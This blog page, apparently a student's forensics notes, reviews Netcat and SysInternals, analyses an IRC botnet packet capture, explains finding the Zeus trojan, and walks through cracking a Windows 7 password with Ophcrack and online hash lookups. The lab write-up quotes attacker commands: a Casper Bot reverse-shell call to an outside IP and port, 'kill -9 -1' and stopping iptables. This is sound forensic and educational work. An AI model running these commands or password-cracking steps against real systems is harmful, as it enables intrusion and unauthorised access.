Wednesday, September 16, 2015

Tool: Netcat

Netcat

Description

Netcat is a simple network utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts.

Personal Review

Netcat is a great tool for forensic analysis especially because you can pipe all your commands on the victim computer to your forensic workstation. I find that this helps promote validity of process in case you ever actually end up in the court of law putting bad guys in the slamma-jamma with yo mad forensic powazz. 

Personal Usage Notes

Use Netcat every time you do a forensic analysis. It's best practice and will help you stay organized with your commands the information those commands return. Use a cheat sheet and practice running the different commands so that you can become a master! Seriously though, if you're into forensics you'll probably be using this tool a lot and the faster you get it down the more time you will save.

Source URL


Posted by at No comments:

Tool: Windows SysInternals Suite

Windows SysInternals Suite

Description

Windows OS usually comes with a nice set of administrative tools to help diagnose problems and suspicious activity within the system. However, available for download is an additional admin tool suite that offers so much more. Not to mention. It's free.

SysInternals includes some of the following utilities:
Process Explorer - Task manager on steroids
Process Monitor - Monitors for network activity from almost any process
Autoruns - Specifics on startup processes
AND MORE...

Basically any reputable Windows troubleshooter will be using these tools.

Personal Review

SysInternals is great. It's a bunch of free tools to help you go deeper into your Windows forensic analysis that you thought possible. It would be nice if there could be one tool that sort of combines all the features but hey, for free, I really have no reason to be complaining... and I'm not. I have found SysInternals to be EXTREMELY helpful but there are still A LOT of tools in the suite that I haven't used and am still unfamiliar with. I guess that's because you can still accomplish a lot with just the big ones. I hope to become more familiar with the other tools over time.

Personal Usage Notes

When using Windows SysInternals take some time to go to the site and learn about each of the tools. Often there are options inside each tool that can help expand your information depending on your investigation. Watch some tutorial videos so you know and can recognize which tools will help you best in which situations.

Source URL

Posted by at 3 comments:

Analyzing Wireshark Packet Captures

Wireshark Intro

I recommend going to How to Geek's tutorial for into to Wireshark. This way you can learn to capture packets and all the options that accompany that. Here we just take a simple packet capture and analyze it.

Computer Evidence Analyzed

Below is an image of the IRC relay we were able to isolate from the packet capture. We were able to determine the situation and attack occurring based off of the conversation between two people in the relay.
lab1_tcp_convo.png

Findings

Upon receiving the sanitized packet capture we opened it with Wireshark to view its details. By following the TCP route we isolated the IRC chat relay. The first thing we noticed was a conversation type rhythm in what appeared to be a different language. By copying and pasting the text into Google Translate we were able to determine that the conversation between the two users was in Romanian. By analyzing the conversation further we noticed there was a third party member of the conversation which we determined to be a bot responding to K3nt!’s commands.

There appeared to be four main technical actions taking place on a Unix system based on the commands given.
  • @conback command
    • By searching “@conback” we were able to determine this specific command was related to the Casper Bot. Further investigation revealed that this command when followed by an <ip address> and a <port> creates a reverse shell which gives K3nt! access to the targeted system. The IP address for this command is 74.208.109.177 port 2009. Doing a search on this IP address directs us to a hosting site in Philadelphia. This may or not be the attacker’s actual location but merely a host.
  • id command
    • The “id” command returned that K3nt! was logged in as root once they gained access to the system. We know K3nt! was root because of what the bot returned: uid=0(root) gid=0(root) groups=48(apache).
  • kill -9 -1 command
    • The “kill -9 -1” command basically slashes the process tree by killing all processes with a pid above 1. This essentially crashes the computer and forces a restart.
  • iptables service stop command
    • iptables is the Linux Firewall and K3nt! is clearly stopping the service and bringing down the fire wall.
After taking down the Linux Firewall K3nt! sends a final message: “I am scos ;))” which translates to “I am out” after which, the packet capture ends.

Conclusions

Through analysis of the packet capture and the isolated IRC relay we were able to conclusively determine that the attacker must have used an exploit of some kind to initially infect the victim system with the Casper Bot. Then the attacker was able to gain access to the system using the Casper Bot’s reverse shell and the @conback command. Once inside the system the attacker used the id command to verify their identity as root, use kill -9 -1 to do a quick restart of the system, and then use iptables to turn off the system firewall. Since this is then where the packet capture ends we can assume turning off the firewall was the main objective.
Posted by at No comments:

Zeus Bot


The king of criminal ware, a bot designed specifically for stealing very important information (think bank accounts, SSN, credit cards, etc.). Today we are going to talk what it is and how to find it with and without anti-virus programs.


Zeus (Zbot) is a Trojan malware that runs on Windows systems. It is called the king of criminalware because it is mainly used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
Infection usually occurs through drive-by downloads and phishing schemes (think spam emails). Beware social engineering!

Zeus has three parts: a toolkit, the Trojan, and the command & control server. The toolkit creates the threat, the Trojan modified the infected system, and the C&C server monitors and controls the Trojan.
Zbot was first identified in July 2007 when it stole information from the United States Department of Transportation and has become more widespread since then affected some pretty renown companies.

Number of Zbots Over Time





So when using an anti-virus software I recommend Malware Byte because it has a great track record of finding it.

Without anti-virus software

Run ProcExp and include the column of verified signatures to make sure that all the processes are legitimate. When the video pops up an unsigned/unverified process will pop up. Use this information to find the location of the Zbot executable. You can also use the command netstat -bano to return which processes are operating on which ports. Since Zbot communicates to the C&C server you will see it operating with this command.

  • ProcExp v16.05 - Windows SysInternals Suite
    • Displays information about which handles and DLLs processes have opened or loaded. Use this to view the suspicious process when the Rick Roll video is running and then view which files it has open or loaded.
    • Displays active TCP connections, ports on which the computer is listening, and more.
    • -a: Displays all active TCP connections on which the computer is listening
    • -n: Addresses and ports are expressed numerically
    • -o: Includes process ID for each connection
    • Run this command to see the Zbot PID running on a connection and then look up the PID in the Process Explorer

Additional Information

McAfee has a pretty detailed analysis report for those who want more in depth information.
Posted by at No comments:

Recovering Windows 7 Passwords

Recovering Windows 7 Passwords


 So you're a Windows user and have locked yourself out of your computer. I don't know, maybe you changed your password recently and it was something you just couldn't remember but now all your files are on this box and you just can't get in. What do you do?

 Use a live CD!

 Okay... so what is that?

 A live CD is a complete bootable computer installation including operating system which runs in a computer's memory rather than loading from a hard disk drive.

Ophcrack & Rainbow Tables

In this case, I used OphCrack. Ophcrack is a live CD specifically designed for cracking Windows passwords with rainbow tables. Don't know what a rainbow table is? No worries, I'll explain.

 Whenever you create a password, that password is hashed using a security protocol. So if my password was "pass123" it would actually be stored and recognized by the computer as a hashed series of numbers and letters. Rainbow tables are huge (like terabytes) files full of potential passwords and their hashes.

 In Ophcrack's case it gets the hash from the locked computer's memory and then goes through all its rainbow tables to find the matching hash!

 So when you boot into Ophcrack and run the password cracker it'll look like this:

notfound-ugh.png


Ophcrack comes with a free basic rainbow table and you can buy better complex ones. In this case, the basic rainbow table doesn't quite crack the password but it does give me the password's hash. 

 In that case you can go to a hash database site online (make sure it is a hash database for the correct security protocol) and find the clear text that matches the hash. I used NTLM protocol and hashkiller.co.uk in this case.
hashashashash.png

Recovering vs Resetting a Password

So there you have it. Live CDs and rainbow tables. If you need to simply rest your password you can follow tutorials for such a situation online. 

However if you have any encrypted files on your computer, resetting your password will lock you out of all these! This is because when you reset your password through Control Panel, Windows will automatically update the password for your encrypted files. When you rest your password any other way, it won't update the files, hence, you'll be locked out. So careful! Don't forget, you can always Google!
Posted by at No comments:
Subscribe to: Posts (Atom)